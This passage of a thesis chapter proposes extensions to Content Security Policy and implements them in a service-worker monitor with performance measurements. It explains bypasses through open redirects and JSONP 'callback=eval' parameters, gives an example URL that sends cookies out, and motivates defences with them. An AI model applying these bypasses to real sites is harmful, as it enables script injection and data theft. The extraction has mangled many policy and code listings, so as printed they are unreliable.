img-src t ru s te d . c om / i ma g e . pn g ;

Listing 5.1 – Example of an origin-based CSP

default-src ’ n on e ’ ;form-action ’ n on e ’ ;

frame-ancestors ’ n on e ’ ;report-uri / a ll c on t en t

Listing 5.2 – Restrictive policy in report-only mode to get the list of content loaded

in a webpage

scr i p t- s rc ’ n o n ce - ra n d om 1 2 34 ’ ’ s t ri c t -d y n am i c ’

Listing 5.3 – Example of CSP with nonces, or nonce-based policy

Listing 5.1 presents a CSP where trusted scripts are whitelisted by their origins. We refer to

them as origin-based policies. Only scripts from the explicitly specified origins are allowed

to load in the webpage on which this policy will be deployed. The injection of a script

with the URL https://trusted.com/script.js in the webpage is allowed since the script

comes from the whitelisted origin https://trusted.com. Listing 5.2 presents a restrictive

policy that basically prevents a page from loading content. Listing 5.3 presents a nonce-

based policy. When a nonce-based policy makes use of the ’strict-dynamic’ keyword, we

refer to the overall policy as a strict CSP. Nonces are used to whitelist individual scripts.

To allow a script to load, one injects <script src="https://trusted.com/script.js"

nonce="random1234"></script> in the page. Note the use of the nonce attribute on the

script tag. Its value is the nonce whitelisted in the policy (See Listing 5.3). With the

presence of the ’strict-dynamic’ keyword, whitelisted scripts (with nonces) that load

in the page can further dynamically inject additional scripts, even though the additional

scripts are not assigned whitelisted nonces 1. Hence, contrary to the origin-based CSP in

Listing 5.1 where one knows the exact origins from which content can load, in the case of

strict CSP in Listing 5.3, scripts that effectively load are known only at runtime (when the

page is loaded in a browser and the policy enforced).

1. Nonces and hashes work quite similarly [272,275]

PUT(0,-845.90042)

82 CHAPTER 5. EXTENDING CSP

2.1 Partially whitelisted origins

In the CSP of Listing 5.1, from the domain https://partials.com, only scripts with the

path /scripts/, for instance https://partials.com/scripts/a.js are trusted. Hence,

trying to inject https://partials.com/script.js will fail. Nonetheless, one can get this

script loaded and executed if it is loaded as the result of an HTTP redirection [272,275].

To illustrate the bypass of partially whitelisted origins, let’s assume that the origin https:

//redirect.com, which is also whitelisted in the CSP of Listing 5.1, hosts an open redi-

rect endpoint https://redirect.com/r. In other words, instead of directly injecting

https://partials.com/script.js, one passes the URL of the script as an argument to the

open redirect endpoint by injecting a script with the URL https://redirect.com/r?url=

https://partials.com/script.js. Instead of returning a script to be executed, the open

redirect generates an HTTP redirection Location: https://partials.com/script.js.

Since this is an HTTP redirection, the browser will not check whether the whole URL

matches the CSP. It is sufficient that the origin of the request be fully or partially whitelisted

in the CSP of the page for the script to be allowed via the HTTP redirection. And since this

is the case (See Listing 5.1), then the script https://partials.com/script.js is allowed

to load, even though its URL does not match the CSP. This bypass works in CSP2 [275]

and CSP3 [272].

2.2 Excluding content from whitelisted origins

Now let’s assume that from the CSP of Listing 5.1, most of the scripts from the https:

//trusted.com origin are trusted. However, the origin also hosts the insecure script https:

//trusted.com/untrusted.js and hosts sensitive scripts in the /admin/ folder (scripts

which paths start with https://trusted.com/admin/) that must be not be loaded in the

current page. CSP does not provide a mechanism for excluding content from an origin.

When an origin is whitelisted, it is trusted in its entirety.

2.3 URL parameters

URL parameters are not taken into consideration when browsers match a URL against a

policy. Consider the CSP of Listing 5.1, the URLs https://trusted.com/script.js and

https://trusted.com/script.js?func=eval&arg=1 all match the CSP if they are used

to inject a script, and the URL https://trusted.com/image.png?data=someuserdata&

cookie=usercookies matches the policy it is the URL of an image injected in the page. In

the first case, the URL does not have any parameter. In the second case, the same URL is

provided the parameters func with the value eval and arg with the value 1. If according

to CSP, these 2 URLs are exactly the same, in practice they may result in the execution of

completely different content. Considering the second case, if the parameters provided are

used to generate the response which is returned back, we run into JSONP requests which

can lead to CSP bypass [212,267]. In the third case, the URL to load the image is passed

some user data and cookies as parameters, so that they are exfiltrated to trusted.com.

2.4 CSP violations

CSP can be used in 2 modes. In the report-only mode, policies are delivered to browsers

using the Content-Security-Policy-Report-Only header. In this mode, content not

matching the policy are not blocked by the browser. They are simply reported as CSP

violations to the developer. In the dual enforcement mode on the other hand, policies

are delivered to browsers using the Content-Security-Policy header. When browsers

PUT(0,-845.90042)

2. PROBLEM AND MOTIVATION 83

enforce such a policy, content that do not match the policy are effectively blocked, and a

violation report is also sent. CSP allows to combine policies in different modes, or even

deploy multiple policies in the same mode. Multiple policies are all enforced individually.

In this case, a resource is allowed to load if it is allowed by all the policies. The directives

report-uri (in CSP1, CSP2) and report-to (in CSP3) are used in a policy to indicate

where CSP violations will be submitted to [272,275].

The violations report mechanism of CSP can be used to build the list of content that load

in a webpage. To do so, one has to deploy 2 policies: a policy in enforcement mode (as

the ones in Listing 5.1 and 5.3), and a policy in report-only mode that does not allow any

content, as the policy shown in Listing 5.2. Since the policy is in report only mode, any

content that attempts to load in the webpage will trigger a CSP violation. Hence, every

content triggers a violation. It is therefore impossible to distinguish between malicious

and trusted content by analyzing the violations reported by a single policy in report-only

mode. So one has to also collect violations triggered by the enforcement of the policy

in enforcement mode deployed to effectively prevent malicious content from loading (i.e.

policies shown in Listing 5.1 and Listing 5.3). Hence violations in this policy are triggered

only by content not matching the policy. Computing the difference between the 2 reports

then gives the content that effectively loaded because they are allowed by the CSP of the

webpage. It is worth mentioning the case of browser extensions, whose content are not

always subject to the CSP of the page [26,200]. For instance, if the policy in Listing 5.1 is

deployed on a webpage, this does not prevent a browser extension from injecting a script

with the URL https://untrusted.com/vulnerable.js, even if this URL is not allowed

by the policy. Worryingly, the browser extension may be injecting a content that introduces

vulnerabilities in the webpage. Moreover, the injection of this script will not trigger a CSP

violation report, even in presence of a CSP in report-only mode as the one in Listing 5.2.

2.5 Motivation

To help mitigate the CSP bypasses due to JSONP and open redirects, Weichselbaum et

al. [267] suggested the use of nonces for whitelisting individual scripts instead of whitelisting

the origins, URLs or path to the scripts. Nevertheless, recent studies question the security

of nonces, mostly because nonces are included in the DOM of webpages, and thereby are

subject to leakage by scriptless attacks [178]. Moreover, the use of nonces does not prevent

a script which is already loaded in a webpage from making requests with unsafe JSONP

parameters, using open redirects, or loading untrusted content. If a whitelisted script gets

compromised by an attacker, then he can bypass the CSP at will. The use of nonces

apply only to scripts (script-src) and stylesheets (style-src) content types, and not to

other types of content. The violation reporting mechanism is more indicated for violations

that occur from time to time, and is not suited for efficiently collecting feedback about

content that load in a webpage. Moreover, it does not report content injected by browser

extensions. Also when the page deploys a strict CSP, collecting feedback is useful because

one cannot know in advance the content allowed by the strict CSP before it is enforced.

To successfully address the aforementioned issues, we propose to extend the CSP specifi-

cation with (i) a blacklisting mode, (ii) a URL arguments filtering mechanism, (iii) new

directives for preventing redirections to partially whitelisted origins and (iv) a mechanism

for efficiently collecting feedback about the runtime enforcement of the policy of a webpage

by browsers.

PUT(0,-845.90042)

84 CHAPTER 5. EXTENDING CSP

3 Extending CSP specification

In this section, we introduce the extensions we propose to the CSP specification.

3.1 CSP in blacklisting mode

Similarly to the Content-Security-Policy and Content-Security-Policy-Report-Only

headers used for deploying a CSP in enforcement and report-only modes respectively, we

propose a new header Content-Security-Policy-Blacklisting for deploying CSP in

blacklisting mode. Semantically, the blacklisting mode is the exact opposite of the en-

forcement mode. Hence, when a URL matches a CSP in blacklisting mode, then it is not

allowed to load. Consider the policy in Listing 5.4.

scr i p t- s rc c dn . c lo u d fa r e . co m / a n gu l ar . j s ;

Listing 5.4 – A CSP in blacklisting mode to exclude angular.js

In enforcement mode, this policy would have allowed the angular.js script to load. By

deploying the policy in blacklisting mode, then the script is blacklisted and hence not

allowed to load. One can therefore combine this policy with another policy in enforcement

mode to prevent only angular.js from loading, while allowing any other content from

cdn.cloudfare.com to load. Listing 5.5 presents the two policies.

Content-Security-Policy: scr i p t- s rc c nd . c lo u d fa r e . co m

Content-Security-Policy-Blacklisting: sc r i pt - s rc c dn . c l ou d fa re .

c om / a ng u la r . js

Listing 5.5 – Combining 2 policies: one in enforcement mode, and the other one in

blacklisting mode

3.2 Checks on URL arguments

To illustrate this proposal, let’s consider the following scenario. Listing 5.6 shows an ex-

ample of a JSONP endpoint which expects the parameter callback and uses it to generate

a function call, and passes it data.

Content-Security-Policy: scr i p t- s rc j s on p . c om

Listing 5.6 – CSP with insecure JSONP endpoint

If an attacker injects http://jsonp.com/?callback=eval in a webpage, the returned re-

sponse is a function call to eval(...). Note that the URL argument is used to generate the

function call. To prevent the URL from loading when it is passed the callback parameter,

one could also deliver a CSP in blacklisting mode as shown in Listing 5.7 in addition to the

CSP in Listing 5.6 that allows parameters to be passed to the insecure JSONP endpoint.

Content-Security-Policy-Blacklisting: sc r i pt - s rc j s on p . c om / ?

callback

Listing 5.7 – Supporting URL parameters in CSP

The CSP in blacklisting mode mandates that, for URLs to load content from jsonp.com,

they must not have the argument callback. While the first policy only (Listing 5.6) would

have allowed http://jsonp.com/?callback=eval to load, deploying also the second policy

in blacklisting mode (Listing 5.7) would block it. By enforcing the CSP in blacklisting

mode, one detects that the URL of the resource to load has an argument, whose name

is callback. Therefore the URL is blocked. Note that this design does not prevent the

PUT(0,-845.90042)

3. EXTENDING CSP SPECIFICATION 85

webpage from loading other content from jsonp.com. For instance, it is completely possible

to load http://jsonp.com/script.js, but not to load http://jsonp.com/script.js?

callback=foo. If the script has some other arguments, then they are allowed to load. For

instance, loading http://jsonp.com/script.js?foo=bar is allowed by the policy above.

We have shown how to prevent URLs with a specific argument (callback in our example).

Now we illustrate additional scenarios on how to filter URLs parameters.

Blocking all URLs with arguments To prevent URLs with arguments, one simply ends

their origins (paths or URLs) with ?in a blacklisting CSP.

Content-Security-Policy: scr i p t- s rc j s on p . c om

Content-Security-Policy-Blacklisting: sc r i pt - s rc j s on p . c om / ?

Listing 5.8 – Blocking all URLs with arguments

The policy in Listing 5.8 stipulates that arguments are not allowed on URLs of scripts

from jsonp.com. Without the CSP in blacklisting mode, any URL from jsonp.com would

have been allowed. Now, the second policy in blacklisting mode will block URLs with

parameters.

Blacklisting URLs when they have specific argument value One can go even more

fine-grained, by blocking URLs only when they have specific parameters that have spe-

cific values. Listing 5.9 shows how to blacklist URLs from jsonp.com when the have the

argument callback with the value eval.

Content-Security-Policy: scr i p t- s rc j s on p . c om

Content-Security-Policy-Blacklisting: sc r i pt - s rc j s on p . c om / ?

c al l ba c k = ev a l ;

Listing 5.9 – Blacklisting URLs with specific argument names and values

While the browser would prevent http://jsonp.com/script.js?callback=eval from load-

ing, it would not prevent http://jsonp.com/script.js?callback=alert from loading.

Specifying multiple unsafe arguments The different scenarios presented above can

be combined to filter out URLs with a set of unsafe arguments. If multiple arguments

are specified for an origin in a blacklisting policy, then a URL is blocked if it has all

the blacklisted arguments. Listing 5.10 is a policy which blocks URLs having both the

callback and arg arguments with any values.

Content-Security-Policy: scr i p t- s rc j s on p . c om

Content-Security-Policy-Blacklisting: sc r i pt - s rc j s on p . c om / ?

c al l ba c k & a rg ;

Listing 5.10 – Blacklisting URLs with multiple unsafe arguments

This policy will block http://jsonp.com/script.js?callback=eval&arg=1, but not http:

//jsonp.com/script.js?callback=eval, because the first URL has both unsafe param-

eters, while the second one does not.

Blocking URLs with at least one untrusted argument To block URLs if they have

at least one argument among a set of unsafe arguments, one can declare the blacklisting

policy as shown in Listing 5.11.

Content-Security-Policy: scr i p t- s rc j s on p . c om

Content-Security-Policy-Blacklisting: sc r i pt - s rc j s on p . c om / ?

c al l ba c k j so n p . co m / ? ar g ;

Listing 5.11 – Blacklisting URLs with at least one of multiple unsafe arguments

A URL will be blocked if it has either the argument callback or the arg with any

values. Hence, http://jsonp.com/script.js?callback=eval and http://jsonp.com/

PUT(0,-845.90042)

86 CHAPTER 5. EXTENDING CSP

script.js?arg=1 will be blocked, while http://jsonp.com/script.js?foo=bar will not

be blocked.

3.3 Preventing redirections

In CSP1, when an origin is partially whitelisted, then only content that match the par-

tially whitelisted origin can load. In CSP2 and CSP3 however, any content from partially

whitelisted origins are allowed to load as the result of HTTP redirections [272,275]. Here,

we propose to extend the CSP specification so as to allow developers to explicitly pre-

vent redirections to partially whitelisted origins. To do so, we propose a new directive

disallow-redirects. When this directive is present in a policy, it prevents redirections

to partially whitelisted origins. Consider the following policy

scr i p t- s rc h t tp s : / / p a rt i a l s . co m / s c r ip t s / . js ;

disallow-redirects;

Listing 5.12 – CSP that uses disallow-redirects to explicitly prevent redirections

to partially whitelisted origins

In case of an HTTP redirection (using an open redirect endpoint for instance), script

from https://trusted.com/script.js would be allowed in CSP2 and CSP3. The new

disallow-redirects directive in the policy instructs the browser to prevent these redirec-

tions to the partially whitelisted origins.

3.4 Reporting runtime enforcement of CSP

In CSP, to collect violation reports sent by the browsers, one must use the report-uri

directive in CSP1 and CSP2, and the report-to directive in CSP3. As we have shown,

only violations are reported to developers. Nonetheless, the content that actually load in

webpages represent valuable information that can be used to improve the security of the

application, by helping to deploy more secure policies. Therefore, following the semantics

of the report-to and report-uri directives used for reporting violations, we propose the

monitor-uri and monitor-to directives for reporting to developers content that effectively

load within a webpage. When content are allowed to load within the page upon enforcement

of a CSP, browsers would generate a report, following similar algorithm used for generating

violations [261,272,275], and send this to the developer to whatever endpoint is specified

in the monitor-uri or monitor-to directives. Listing 5.13 shows an example of a policy

deployed to get feedback on the runtime enforcement of the policy, as well as collect CSP

violations.

scr i p t- s rc t r us t ed . c om ; object-src ’ n on e ’ ;

rep o r t- u ri / r e po rt s / v io l at io n s ;

monitor-uri / r ep o rt s / fe e db a ck ;

Listing 5.13 – Policy to collect violations and feedback

In this example, the monitor-uri directive follows exactly the semantics of report-uri

directive of CSP1 and CSP2.

3.5 Backwards compatibility and implementation overhead

The changes we propose are all backwards-compatible. Browsers not supporting the new

extensions will simply ignore them. The extensions we propose to the CSP specification

only introduce a few modifications to the implementations of CSP in browsers. For instance,

PUT(0,-845.90042)

4. IMPLEMENTATION 87

the blacklisting mode does not require browsers to support a new algorithm, but uses

exactly the URL matching algorithm already implemented by browsers [272,275]. There

is only need for supporting a new CSP header. If the browser already implements CSP,

it just enforces a blacklisting policy as a normal one. The sole difference is in the final

decision: when a URL matches a blacklisting policy, the URL is not allowed, while in

whitelisting mode, it is allowed. The only modifications needed to the CSP URL matching

algorithm are those to support the URL parameters filtering mechanism and the new

directives. The algorithm for filtering out unsafe URL parameters is rather simple to

implement. We provided an implementation of this additional algorithm in Section 4

using the URLSearchParams JavaScript API [145]. We refer to it as the URL parameters

checker. It consists of a dozen lines of code. In doing so, we did not modify the URL

matching algorithm itself. We rather implemented a dedicated function for matching CSP

against URLs parameters. As such, we preserve backwards compatibility in browsers. An

implementation of the URL parameters checker can be plugged into an already existing

implementation of the URL matching algorithm [261,272,275] of CSP in order to further

apply filtering on URLs arguments. Hence, after matching a URL against a request,

the URL is passed to the parameters checker which further checks that the URL does not

carry unsafe parameters. Otherwise the related content is blocked from loading. Regarding

partially whitelisted origins, when a URL is the result of a redirection, the whole URL,

and not only its origin is checked against the policy if the disallow-redirects directive is

used in the policy. If the URL is not explicitly allowed by the policy, it is prevented from

4 Implementation

In this section, we demonstrate an implementation of the proposed extensions to the CSP

specification and an evaluation using service workers. Our goal is to demonstrate that the

CSP specification can be easily extended, in a backwards compatible way, with features

that can improve the security of web applications, by allowing the expression of fine-

grained policies. Even if these extensions are not supported in browsers, we argue that our

implementation could even already be deployed on real world applications. To do so, we

measured the overhead associated with deploying a service worker, which applies CSP in

blacklisting mode, filters URLs arguments, and reports feedback, by using an example of

web application.

Web Application Monitor Internet

Browser

Figure 5.1 – Monitoring CSP Enforcement

In our implementation, we deploy a monitor. It acts like a proxy as shown by Figure 5.1.

It intercepts requests made by the browser to load content in a web application. It is

seamlessly and easily integrated to the application by the developer from the server-side,

without requiring users or browsers to undertake any particular action. In addition to de-

ploying a CSP in enforcement mode that will be enforced by the browser, the developer also

PUT(0,-845.90042)

88 CHAPTER 5. EXTENDING CSP

deploys a CSP in blacklisting mode. In this policy, the developer can express fine-grained

policies regarding unsafe URL parameters, partially whitelisted origins, blacklisted content

and provide an endpoint where to submit feedback. So the CSP in enforcement mode is

enforced by the browser, while the one in blacklisting mode is enforced by the monitor.

When a content is injected in a webpage, first the CSP in enforcement mode is enforced

by the browser. When a URL matches the policy, the browser makes a request to fetch

its content. This request is intercepted by the monitor, and the CSP in blacklisting mode

is applied. Upon enforcement, the monitor checks whether the URL is not a blacklisted

one and does not carry unsafe parameters. In the particular case of partially whitelisted

origins, HTTP redirections are not visible to service workers for privacy reasons [275]. Nev-

ertheless, to implement the semantics of the disallow-redirects directive, one can use

the blacklisting and URL filtering mechanisms to either blacklist open redirects endpoints

or filter out their unsafe parameters. Then once a URL is allowed by the monitor upon en-

forcement of the policy in blacklisting mode, the request is made. Otherwise, it is blocked.

The monitor also logs all requests that it intercepts, and reports them as feedback about

the enforcement of CSP in the browser.

The monitor is not meant to replace the CSP enforcement provided by browsers. It rather

complements it by filling the CSP expressiveness gap at fully mitigating bypasses. It adds a

reporting mechanism for developers to get the set of content being loaded in the application.

4.1 Implementation of the URL filtering algorithm

Following we provide an example of implementation of URL arguments checker algorithm.

function u ns a f eA r g um e n ts ( o ri gi n , u rl ) {

if ( origin.indexOf("?") = = - 1 )

return true ;

var oArgs =origin.split("?") . s l ic e ( 1) . j o in ( "?") ,

uArg s =u r l. sp l it ( "?") . s li c e (1 ) . j oi n ( "?");

if ( ! o Ar g s & & ! uA r gs )

return false;

var oparams =new U RL S ea r c hP a ra m s ( o Ar gs | | "") ,

uparams =new U RL S ea r c hP a ra m s ( uA r gs | | "");

f or (var i t o f o p a ra m s . ke y s ( ) ) {

if ( ! u p a r am s . ha s ( i t ) ) {

return false;

}else{

var ovalue =o pa r a m s. g e t ( i t ) || " " ,

uvalue =u pa r a m s. g e t ( i t ) || "";

if ( ovalue && ovalue !=u va lu e ) {

return false;

}

return true ;

}

Listing 5.14 – Implementation of the URL arguments matching algorithm using the

URLSearchParams API [145] in JavaScript

The implementation is done in JavaScript, using the URLSearchParams API [145]. If

the function returns true, then the URL is blocked, otherwise it is allowed. Recall that

blacklisting URL arguments is meant to be used with CSP in blacklisting mode. So, the

URL matching algorithm is first applied. Then, when the URL matches an origin in the

PUT(0,-845.90042)

4. IMPLEMENTATION 89

Table 5.1 – Matching arguments in an origin against arguments in a URL

Origin URL Match

a.com/? a.com/s.js 7

a.com/? a.com/s.js?func=eval

a.com/? a.com/s.js?func=eval&arg=hello

a.com?func a.com/s.js 7

a.com?func a.com/s.js?arg=hello 7

a.com?func a.com/s.js?func=alert

a.com?func a.com/s.js?func=alert&arg=hello

a.com?func=eval a.com/s.js 7

a.com?func=eval a.com/s.js?arg=hello 7

a.com?func=eval a.com/s.js?func=alert 7

a.com?func=eval a.com/s.js?func=eval

a.com?func=eval a.com/s.js?func=eval&arg=hello

a.com?func=eval&arg a.com/s.js 7

a.com?func=eval&arg a.com/s.js?func=eval&arg=hello

a.com?func=eval&arg a.com/s.js?func=alert&arg=hello 7

blacklisted CSP, it is further passed to the arguments checker. If the origin of URL does

not declare any unsafe arguments, it means that the URL must be blocked since it already

matches the blacklisted origin. We can say that the blacklisting is at the origin level.

Otherwise if the blacklisted origin specifies unsafe arguments, then the URL is blocked if

its arguments match the blacklisted arguments of the origin. In this case, we can say the

blacklisting is at the arguments level. Section 3.2 gives all the details about filtering out

URL parameters.

Given an origin and a URL, the URL arguments checker checks whether the blacklisted

arguments of the origin are found among the arguments of the URL. Table 5.1 shows the

application of this algorithm on different origins and URLs. When there is a match between

the origin and the URL, then the URL is blocked.

4.2 Implementation of the URL matching algorithm

We also provide an implementation of the CSP2 URL matching algorithm [275]. We

considered CSP2 since it is the latest stable version of CSP. The implementation allows us

to match origins against URLs (blacklisting mode) before checking the URLs arguments

against origins arguments. Our implementation follows from the specification. The code

is available online at https://swexts.000webhostapp.com/monitor/.

4.3 Service workers

Service workers [149] are an experimental technology, already implemented in major browsers

including Chrome, Firefox, Opera, Microsoft Edge and Safari 2. They act as a proxy, part of

the application itself, which can however intercept all HTTP requests made by the browser

to load content in an application. Service workers are deployed as part of the application,

but once executed, will reside in the browser and intercept all requests going out of the

application, as well as all incoming responses destined to the application. Service workers

have been introduced among other things, to enable web applications to provide users with

2. https://jakearchibald.github.io/isserviceworkerready/

PUT(0,-845.90042)

90 CHAPTER 5. EXTENDING CSP

an offline experience when network is unavailable. It appears that they perfectly fit the

needs of our monitor, and we use them to implement the latter.

Description and set up

This quotation from Mozilla Developer Network defines very well service workers [149]

A service worker is an event-driven worker registered against an origin and a

path. It takes the form of a JavaScript file that can control the web page/site it

is associated with, intercepting and modifying navigation and resource requests,

and caching resources in a very granular fashion to give you complete control

over how your app behaves in certain situations, (the most obvious one being

when the network is not available.)

First of all, the service worker itself is a JavaScript file which makes use of the specific

APIs made available to it by browsers. Then the service worker is deployed by referencing

it in the application whose requests it intercepts and manages.

Intercepting requests Following is how service workers intercept requests made from an

application.

self.addEventListener(’ f et c h ’ ,function(e v en t ) {

url =ev e n t. re q ue s t. ur l ;

content_type =event.request.destination;

page =event.request.headers.referer

}

);

Listing 5.15 – Intercepting requests in service workers

To intercept the URLs of requests, service workers listen for fetch events, which are trig-

gered each time that a request is initiated by the browser to load content in the application.

Note that those requests are done after the browser enforces the CSP of the application on

the URL of the content to load. The request object of the event contains all the informa-

tion necessary to make the request (URL of the request, type of content being loaded, the

specific page from which the request is being made, data sent along the request in case of

HTTP POST requests, ...) [149]. As shown in Listing 5.15,url represents the URL of a

request intercepted by the service worker, content_type the type of content that the URL

will load (script, image, ...) 3, and page, the specific page of the application from which

the request is being made. This helps for instance, to deploy a single service worker for an

entire application made of multiple pages. The monitor specifically makes use of this three

categories of information (URL of request, content type and URL of the page), which are

sufficient for it to check whether the request of the particular type should be allowed or

not, in the specific page. When the request is allowed, the monitor lets it proceed using

the fetch API [54], as shown in the following Listing 5.16.

event.respondWith(

return f et ch ( e v en t .r eq u es t ) . then(function( r e sp o ns e ) {

return res p o ns e ;

})

);

Listing 5.16 – Making a request from the service worker

3. This information is not available on Firefox service workers

PUT(0,-845.90042)

4. IMPLEMENTATION 91

Otherwise, the request is blocked. This is achieved by generating and returning an empty

response in the monitor, using the Response API 4.

event.respondWith(

return new Re s p o ns e ( ) ;

);

Listing 5.17 – Blocking a request

Deployment To deploy the service worker (monitor), one has to indicate to the browser the

location (URL) of its code on the application server. Additionally, one indicates whether

the monitor is deployed for a specific page or for an entire application (origin). To deploy

service workers for an entire application, one can simply modify the main (HTML) page

of the application, and the service worker will be deployed for the entire application.

...

if (’ s e r vi c e Wo r k er ’ in n av i ga t or ) {

navigator.serviceWorker.register(’ / s w. j s ’, { scope: ’ / ’ })

.then(function( r eg ) {

console.log(’ S er v i ce W o rk e r S ta r te d ’ ) ;

}) . c at ch (function (error) {

console.log(’ S er v i ce W o rk e r F ai l ed ’ );

}) ;

}

</script>

...

Listing 5.18 – Deploying a service worker for an application

In Listing 5.18 above, sw.js is the JavaScript file of the service worker located on the

application server, and the service worker is registered for the entire application scope:

’/’.

Enforcement of the CSP in blacklisting mode

We have already described an implementation of the URL checker algorithm (See List-

ing 5.14) and an implementation of CSP URL matching algorithm (Section 4.2). All these

implementations are included in the service worker file that is deployed. When a web

server sends a CSP in blacklisting mode (using Content-Security-Policy-Blacklisting

HTTP header) with the response to a request to load a webpage, the monitor intercepts

and saves on the fly the CSP in blacklisting mode. Then, when a request to load content

on the page is intercepted (Listing 5.15), the URL of the request is checked against the

blacklisting policy of the page. If the URL of request does not match the blacklisting

policy, the request is normally made (Listing 5.16). Otherwise, the request is blocked. In

this case, the monitor (service worker) returns an empty response (Listing 5.17).

In any case, requests that are intercepted, are logged. Requests that are blocked (because

they are blacklisted content or because of their unsafe parameters) are also logged. This

is submitted to the endpoint specified by the developer in the monitor policy. In our

implementation, the reports are sent every 15 seconds5. That is the feedback about the

enforcement of CSP on the application. In our implementation, we fix the URL where the

feedback is sent to.

4. https://developer.mozilla.org/en-US/docs/Web/API/Response

5. We have chosen this number randomly, as all content on our example pages are loaded before this

delay expires

PUT(0,-845.90042)

92 CHAPTER 5. EXTENDING CSP

We provide online at https://swexts.000webhostapp.com/monitor/, our ready-to-user

monitor and guidelines on how to easily integrate it to web applications.

5 Evaluation

We deployed the monitor on an example web application (located on the localhost), with

different types of content (scripts, images, stylesheets, fonts, XMLHttpRequests, etc.).

The CSP of the page is shown in the following Listing 5.19.

scr i p t- s rc ’ s e lf ’ h tt p: //localhost:5000 http://localhost:7000

Listing 5.19 – CSP in enforcement mode deployed on the webpage

It allows scripts of the site own origin, and from 2 third party origins. To simulate third

party origins, we deployed multiple example applications on different ports of the local-

host (ports 5000 and 7000). The application itself is deployed on port 8000. To further

apply additional checks on URLs of requests to these origins (the 2 third party origins in

particular), we deployed the CSP in blacklisting mode shown in Listing 5.20

s cr ip t -s rc h t tp : // l o ca l h os t : 50 0 0 / aj a x / li bs / a ng u l ar . js / h tt p : //

localhost:7000/?

Listing 5.20 – Blacklisting CSP used to apply further checks on the content allowed

by the CSP in enforcement mode

It blacklists (excludes) scripts whose paths start with http://localhost:5000/ajax/

libs/angular.js/ from the origin http://localhost:5000 whitelisted in the CSP of

Listing 5.19. URLs to http://localhost:7000 that carry any arguments will also be

blocked by the monitor.

The deployed monitor has been able to successfully enforce the blacklisting policy on con-

tent we injected in the application. We also tested the monitor with nonce-based strict

CSPs, and with toy browser extensions injecting content in the webpage. All such con-

tent have been successfully intercepted by the monitor and applied the CSP in blacklisting

mode. Finally, the monitor was also able to log and report all content intercepted, blocked,

and loaded. On a real web application, by analyzing the reported feedback, one may be

able to detect potentially malicious or untrusted content loaded as a result of errors or

misconfigurations, or as a result of an attacker exploiting a content injection vulnerability

in the application. This also includes content dynamically injected in strict CSPs, and

content injected by browser extensions.

The following is a report sent by the monitor upon enforcement of the blacklisting policy.

[

{

" u rl " :" h tt p: / / l oc a lh o st : 80 0 0 / sc r ip t .j s ? BN f WB 8 ts r M " ,

" t yp e " :"script",

"blocked":f a l s e

{

" u rl " :" h tt p: / / l oc a lh o st : 80 0 0 / sc r ip t .j s ? K3 V c6 k sI e V " ,

" t yp e " :"script",

"blocked":f a l s e

{

" u rl " :" h tt p: / / l oc a l ho s t: 7 00 0 / s cr i pt s / c sp i nc l us i on . js ?

callback=zleYLgrXNQ",

PUT(0,-845.90042)

5. EVALUATION 93

" t yp e " :"script",

"blocked":true

{

" u rl " :" h tt p : // l o c al h os t : 50 0 0 / a ja x / li b s / an g u la r .j s / 1 .7 . 2/

angular-animate.js",

" t yp e " :"script",

"blocked":true

{

" u rl " :" h tt p: / / l oc al h os t :7 0 00 / s cr i pt s / c sp in c lu s io n .j s " ,

" t yp e " :"script",

"blocked":f a l s e

{

" u rl " :" h tt p: / / l oc a lh o st : 80 0 0 / sc r ip t .j s ? Ay h R4 p kC a J " ,

" t yp e " :"script",

"blocked":f a l s e

{

" u rl " :" h tt p: / / l oc a lh o st : 80 0 0 / sc r ip t .j s ? VP J S8 x fJ b n " ,

" t yp e " :"script",

"blocked":f a l s e

{

" u rl " :" h tt p: / / l oc al h os t :7 0 00 / s cr i pt s / c sp in c lu s io n .j s ?

callback=QZ4d2uiq8Y",

" t yp e " :"script",

"blocked":true

{

" u rl " :" h tt p: / / l oc al h os t :7 0 00 / s cr i pt s / c sp in c lu s io n .j s ?

callback=cmkRJvjPih",

" t yp e " :"script",

"blocked":true

}

]

Listing 5.21 – Feedback reported by the monitor

Entries in the report array with the "blocked": true property are content that are

allowed by the CSP of the page as enforced by the browser, but blocked by the monitor

after applying the blacklisting CSP.

5.1 Performance overhead

We evaluated the overhead introduced in a web application, with the use of a monitor. To

do so, our example webpage is embedding a set of content of different types. In particular

it has 3 scripts for measuring the load time of the application:

— A first script which, when executed, registers the start time. It is the first script

loaded in the webpage.

— A second script is responsible for dynamically loading in the webpage many content

of different types (scripts, stylesheets, fonts, images, etc.).

— A third script injected at last, is responsible for measuring the end time. It is the

last script executed in the webpage.

PUT(0,-845.90042)

94 CHAPTER 5. EXTENDING CSP

The page is composed of the following content:

— 20 scripts, each further making 1 synchronous XMLHttpRequest;

— 20 stylesheets, further loading 1 font each;

— 20 (JPG) images.

The application is served from the localhost to avoid latency and delay introduced with the

network if it was deployed on a remote server. Time is measured using the performance 6

API, 100 times in different browsers (Chrome, Firefox, Opera, and Brave). All resources

loaded are never cached, so that all measurements are done in the same conditions.

A first measurement is done when the application is not deploying any monitor (No Monitor).

Then, another measurement is done when the monitor does not perform any action apart

from simply forwarding all the requests that it intercepts (Unenforced Monitor) without

applying the monitor policy. This is done to measure the overhead introduced by the

use of service workers. Finally, a last measurement is done when the monitor enforces a

blacklisting policy (Enforced Monitor).

The different times are shown in Figure 5.2 for Chrome browser, version 66, on an Intel(R)

Core(TM) i7-4710MQ CPU @ 2.50GHz, 64 bits, with 16Gb of RAM. Results in other

browsers are similar and therefore omitted.

time (ms)

No Monitor Unenforced Monitor Enforced Monitor

0 20 40 60 80 100

200

400

600

800

1000

Figure 5.2 – Performance overhead of deploying the monitor

As one may observe, the main overhead is due to the use of service workers to implement

the monitor (Unenforced Monitor). Comparatively, enforcing the monitor policy itself

introduced a negligible overhead (Enforced Monitor). We think that this is an acceptable

overhead, in comparison to the security benefits that one gains with the deployment of the

monitor.

Overhead of applying the CSP in blacklisting mode

We further measured the specific overhead of applying CSP within the monitor to blacklist

content. To do so, we collected the CSP and scripts of 100k Alexa sites (home pages and up

to 100 pages related 7to the site). When the page had a CSP, we extracted the whitelisted

origins of its script-src directive. This resulted in 6,481 unique sets of script-src

6. https://developer.mozilla.org/en-US/docs/Web/API/Performance

7. Pages from the same origin as the site, and pages from a subdomain

PUT(0,-845.90042)

6. DISCUSSIONS AND LIMITATIONS 95

directives and the associated values. We further gathered all the origins whitelisted in all

script-src directives into a single set of unique origins, totaling 11,982 of them.

Then we randomly selected 6,481 scripts, corresponding to the number of unique script-src

directives. To each script, using our implementation of the CSP URL matching algorithm,

